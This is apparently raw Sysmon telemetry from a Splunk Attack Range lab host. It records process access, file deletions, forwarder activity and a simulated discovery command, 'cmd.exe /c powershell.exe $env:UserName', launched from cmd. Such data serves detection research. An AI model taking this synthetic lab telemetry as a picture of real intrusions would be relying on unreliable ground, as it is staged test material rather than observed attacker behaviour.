13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-A283-6140-BC56-04000000C801}45721960C:\Windows\system32\cmd.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.590{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe $env:UserName 
C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\System32\cmd.execmd.exe /c powershell.exe $env:UserName 10341000x800000000000000036498872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-6638-6125-B000-01000000C801}12085068C:\Windows\system32\cmd.exe{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x800000000000000036498865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.579{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exe /c powershell.exe $env:UserName C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x800000000000000036498864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE54FC5A365EE073F4D4CA3DB26ACE58,SHA256=517FCD806D4032DA67210D9BB5718774FF1F6F9DAD3B9ABF0236102A904910C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A41B5516920D1515BC41519A72F993C,SHA256=18243CED568CF2F7B204043A2454B235944206520DEA3574B30D0CDC83AD1903,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.571{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9FB00E0057A535AC25DE42FE5E42DD9,SHA256=14543053D08FC67AD3CE53B32D24A9B6D52382DAFE645DEA62F20E93D15A1545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2148CAC7564CF1509B909AA52A39340F,SHA256=032D94F475A3DCAD0D1CC71E80FE04AAE59F90794846D2B895B7D65F553235BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=052D82B9D64CCF3AC99AB989F74F2E2E,SHA256=799C08E23D88CD66560339EAEDA622C76F7D96315A9A6196229899A80DC7A190,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:21.054{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75417E06D2A2DC4919F5CE618D95732,SHA256=05B034480A913C3ADB7F171411AE119EF73CFC957EDA149B7138455E312CFF3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036498898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:52.910{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50704-false10.0.1.12-8000- 354300x800000000000000036498897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:52.348{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50703-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:22.100{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A008265424563D4B09236F37A0FAA9F6,SHA256=C2252B51E0BEF18180F3813B735EC522048A6CC38B5BA0750F51DC4D5CCC54E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:23.284{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=50F5CE5628848D0A64A7A7E22632642B,SHA256=21D1147AC29133D4076AD82D4CED3BA1FD9388B8AE18F6B7FDE95510EEBC1339,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:23.137{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A23FEF27389E273CB4BA76177B61692,SHA256=22B91A92798C2969D97E35CE35E07787F9953E5122DFB50C0D9A0A891FC59525,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.683{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036498910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.298{B81B27B7-A288-6140-BE56-04000000C801}37684852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E8445FA88F6DB906738E339F728B9CD,SHA256=A98C093D8BDEDDB69D4D5648FD248D2ABE5EC72733591E86577AAC9A468104C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.136{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A288-6140-BE56-04000000C801}3768C:\Program 